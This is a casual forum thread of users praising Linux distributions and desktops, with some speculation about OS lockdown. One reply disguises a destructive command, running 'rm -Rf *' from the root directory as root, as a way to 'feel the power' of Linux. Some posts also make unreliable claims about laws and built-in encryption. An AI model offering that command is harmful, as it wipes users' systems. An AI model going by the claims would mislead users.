Re: Linux is AWESOME!!!
I've been using Linux since 2008 with Ubuntu 8.04. Then went to Fedora, to Arch. Then after they released Gnome 3 and Unity, I started to go back to Windows 7 and used KDE for a while until Linux Mint came out with MATE. I hate Gnome 3 and Unity. So un-user friendly it makes me puke. Actually, everything is turning un-user friendly it seems anymore.

Unity and Gnome3 go the same path as windows and are less user friendly than Gnome2 atm
IMHO they need to change their policy
KDE Is ok but I prefer xfce - some say its difficult but rly? fast, reliable and easy to configure
need to try gentoo but Im with xubuntu 13.04 now - best ubuntu distro since (13.04 was better than all previous even at early alpha)

sadly, as much as i like linux,
i have read that windows and intell, and the major makers
of computers are going to to the one OS system per computer,
based in the bios or computer hardware,
so at some point linux users will be shit out luck.
they will just make it against the law, if they allready have not, to chnage your OS.

i see what your saying, but what dose have to do if the major computer makers and intell and microsoft had said they are going to do this?
isn't kinda just wishfull thing on your part to think,
they would not do what they said the compuer industry is head for?
besides the only real wh\ay for them to stop internet fraud and crime is to control evrything threw the cloud and to lock down deaktop/labtop computers.
your phones and netbooks are most just termanals for super mainframe cloud computers anyway,
the major user are now phones and pads.
home desktops are at a alltime low.

ubuntu kinda sold out i think or got bought out,
once they started to do linking from with in os to all those major companys and then hafeassed told people they could turn
it off, i stoped useing it.

i have no idea why they did that , unless it was to try to
get more ex window users wich was mostly their whole user
base to begen with.

phones and tablets are mostly linux (android and chrome are a good example)
MS controlls Desktops and Laptops (80%) but thats only part of the market
most serious server machines run linux (and most supercomputers)
to be exact - most machines, including mini cpus everywhere, are linux (or unix) based
many countries (including Brasil and now China) opt for going away from MS as a 'state system'

what you say is impossible to achieve - they will never be able to monopolyse the market (+ as I said - its against the law)

Re: Linux is AWESOME!!!
Oh Cool! Way to go.
If you really want to feel the power of linux type the following lines in a terminal as root.
cd /
rm -Rf *

enjoy!!!

LOVE LOVE LOVE this operating system!!

I went with the big deal first, (Linux Mint) but I didn't like it much to be honest. It had crash issues on my computer, the graphics were messed up a little here and there and I just didn't care for the whole look of it.

I was almost ready to give up and go back to Windows and came across a version of Linux called OpenSuse.

O.M.G.

WHAT A DIFFERENCE!! Much nicer in appearance than Mint and it hasn't crashed on me a single time in the week that I've had it.

I mean this layout is bad ass and the different things you can do with graphics and customizing your desktop are sweet. It runs VERY close to how Windows runs too so you don't have to learn a whole new skill set to get started.

If you're on the fence about Linux, trust me, they have fixed the issues, go for it. You won't regret it. It has no backdoors like Windows does, it's ENCRYPTED, it is ENTIRELY open source which means others can add to it and make it better. You really can't ask for anything more, Linux is the shit.

And it's FREE!! 5a

I have the newest version of OpenSuse, 12.2 with the KDE desktop. If you don't know what that means, like me, it's no problem, the OpenSuse website guides you every step of the way and allows you to choose which desktop you run.

Download the file, burn the image to a DVD and you're done.

I also love being able to keep my Windows with it and I have a choice which one I want to use before the computer boots up.

One thing I have noticed is that Linux doesn't support blueray/HD 1080p, so I keep a copy of Windows on my hard drive that I use solely for that. On the other hand Linux plays streaming HD content MUCH better than the other so I go to OpenSuse for that and general everyday surfing etc.

AMAZING!

If you want to get started, I can help with the setup and questions.

There are so many "free" links out there that are actually total drive wipes. The freaks get off on this stuff. It's horrible.

Easy to print, not sure what your issue is.

Adobe suite along with Houdini, Poser, and more in a Virtual Machine as well as an OSX VM for FCP/DVD Studio Pro.

Could care less about games, some people actually WORK on their systems.

Pretty weak arguments there dude. Bet you've never even tried anything else...

I have both - linux and windows installed
windows 7 sp1 mod - my own barebone version
and yeah - games not always run - thats why I use win
and thats the only reason since everything else is here and often much better

just stop fighting since its getting old and noone will win here (lets join and smack the apple users instead bwahaha)

My little setup (FreeBSD box but I have no doubt any Linux could do this also):

[link to imageshack.us]

That's FreeBSD running VM's of XP, OSX, and OpenSUSE simultaneously on a tower with 3 gigs of RAM total. The only notice slowdown is the OSX VM when in seamless mode. Of course I don't typically run all 4 at once, usually just FBSD and XP so I can maximize RAM usage in XP for After Effects and Photoshop. Why fight, just use 'em all at once :)
